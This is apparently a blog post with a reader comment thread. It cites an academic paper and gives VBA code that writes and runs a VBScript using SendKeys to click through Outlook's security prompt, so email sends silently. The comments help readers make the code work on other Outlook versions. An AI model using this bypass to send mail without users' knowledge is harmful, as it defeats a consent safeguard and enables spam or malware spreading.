Also see Reinforcing Dialog-Based Security, a paper by two U.S. Air Force Academy professors that demonstrates how to get around the object model guard prompts using VBScript code and the SendKeys method to, in effect, click the buttons on the prompts.
Reinforcing Dialog-Based Security
Reinforcing Dialog-Based Security
Martin C. Carlisle, Scott D. Studer
Proceedings of the 2001 IEEE
Workshop on Information Assurance and Security
United States Military Academy, West Point, NY, 5-6 June, 2001
Reinforcing Dialog-Based Security
Sub bypass()
Dim fName As String, fDesc As Integer
fName = getConfig("bypassFile")
fDesc = FreeFile
Open fName For Output As fDesc
Print #fDesc, "Set fso = CreateObject(""WScript.Shell"")"
Print #fDesc, "While fso.AppActivate(""Microsoft Outlook"") = FALSE"
Print #fDesc, "wscript.sleep 1000"
Print #fDesc, "Wend"
Print #fDesc, "wscript.sleep 7000"
Print #fDesc, "fso.SendKeys ""{LEFT}"", True"
Print #fDesc, "fso.SendKeys ""{ENTER}"", True"
Close #fDesc
Shell ("WScript.exe " & fName)
End Sub
Sub sendMail(strSubject As String, strBody As String)
Dim OutApp As Object
Dim OutMail As Object
Dim strTo As String
strTo = getConfig("mailTo")
Set OutApp = CreateObject("Outlook.Application")
OutApp.Session.Logon
Set OutMail = OutApp.CreateItem(0)
Call bypass
On Error Resume Next
With OutMail
.to = strTo
.CC = ""
.BCC = ""
.Subject = strSubject
.body = strBody
.Send 'or use .Display
End With
On Error GoTo 0
Set OutMail = Nothing
Set OutApp = Nothing
End Sub
10 comments:
I'm trying to use the code buy it gives me an error message related to "GetConfig".
I'm using Outlook xp
Now everyone cant get in touch with you for details... Either publish solution for GetConfig error or say it is just a fake code... Cheers!
legonzales@yahoo.com
I found the other piece of your code in a related thread.
I'm using outlook 2003 and it seems not to work
i have the same problem when i use
fName = getConfig("bypassFile")
tks for your comment!
getConfig() is an user function. you must to write it, or assign the value by any other way.
Hi,
Can I get an example of the getConfig() function?
WKR,
Dogan
about getConfig. this is a custom function that returns the desired string. in the case of the sub bypass it returns the name of the VB script file.
in example, c:\tmp\bypass_toto.vbs.
i like to use configuration files, ie INI style files, so in general, i make a custom getConfig function in order to take the desired parameters saved in some part or file
of course, this getConfig function can be implemented in many ways, or NOT use it at all
that is, in the sub bypass, it can be used directly:
fName = "c:\tmp\bypass_toto.vbs"
with any name or path, because this is only an auxiliar file
the same for the other case, strTo is the destination. this destination can be taken from somewhere with a custom function. also it can be used directly in the code, that is
strTo = "toto@gmail.com"
so getConfig(key) can be written in many ways, acording with the interests of the programmer. getConfig can take the desired key from an INI file, or from the command line, or from a data written in the code, or from a dialog with the user, or from a database, or from ....
my best regards
Note: Outlook 2003 and 2007 identify themselves as "Microsoft Office Outlook" - replace the line of code referencing "Microsoft Outlook" with "Microsoft Office Outlook" to make this code work.
Note: Outlook 2003 and 2007 identify themselves as Microsoft Office Outlook, so if you've got '03 or '07, you have to change "Microsoft Outlook" to "Microsoft Office Outlook."
Good Luck!
Post a Comment